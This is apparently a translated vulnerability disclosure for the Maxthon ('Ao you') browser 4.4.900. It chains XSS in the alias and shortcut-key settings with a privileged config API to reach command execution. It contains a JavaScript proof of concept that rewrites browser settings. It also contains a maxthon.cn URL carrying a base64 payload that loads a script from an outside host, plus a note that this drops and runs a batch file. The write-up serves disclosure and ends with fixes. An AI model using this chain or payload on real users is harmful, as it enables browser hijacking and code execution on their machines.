Ao you Browser Remote Command Execution Vulnerability

Ao you Browser Remote Command Execution Vulnerability

Ao you browser has been updated to 4.4.900.

Download the latest version and find that the XSS that adds the home page to the configuration center has been fixed. However, you can find two more XSS.



1st. In the configuration center, there is a direct website address function, where the alias is not filtered out.
 

 

2nd. This is relatively hidden, In the add one-click place to select the shortcut key only F1-F12, apparently there is no way to directly change the shortcut key.


 

However, the test showed that the modification can be made through the api provided by aoyou.

Try to change F1 to "> and find that the shortcut key is not filtered.


 

To change the browser settings, you can use maxthon. browser. config. configManager, but * .maxthon.cn can call this api, so you only need to find an XSS of * .maxthon.cn, which is not difficult.



Because mx: // res/notification/can call maxthon. program, mx: // res/app/% 7B33CA60D6-EADC-4558-9185-2EBE14214AB9% 7D/index.htm

You can call maxthon. io and use the methods mentioned in WooYun: remote command execution vulnerability in the Ao you browser (Web Client + client exploitation skills) to construct the following POC

 

b = [{'">':"www.qq.com"},{"F2":""},{"F3":""},{"F4":""},{"F5":""},{"F6":""},{"F7":""},{"F8":""},{"F9":""},{"F10":""},{"F11":""},{"F12":""}];c = window.JSON.stringify(b);maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.targeturl.shortcuts",c);maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.startpage", "mx://res/options/index.htm");

Then, use the XSS of * .maxthon.cn to call the POC above.



Http://tuan.maxthon.cn/en_US/search/all/Ij48c2NyaXB0IHNyYz1odHRwOi8vdXRmNy5tbC90L21heHRob24yLmpzPjwvc2NyaXB0Pg==


 

 

In addition, ao you browser has a design defect, that is, the peripheral privileged website is too wide, even if the local privileged domain does not have XSS,

XSS of privileged websites can do many things. For example, the maxthon. browser. config. ConfigManager api can be used to modify all browser configurations, such as adding proxy servers.

Actual test:

After accessing the following URL, a test. bat file will be written and run on drive D next time you start the browser.

Http://tuan.maxthon.cn/en_US/search/all/Ij48c2NyaXB0IHNyYz1odHRwOi8vdXRmNy5tbC90L21heHRob24yLmpzPjwvc2NyaXB0Pg==

 

Test version


 

 

Solution:

1. do not refer to the supplementary

2. narrow the scope of peripheral privileged websites

3. Repair XSS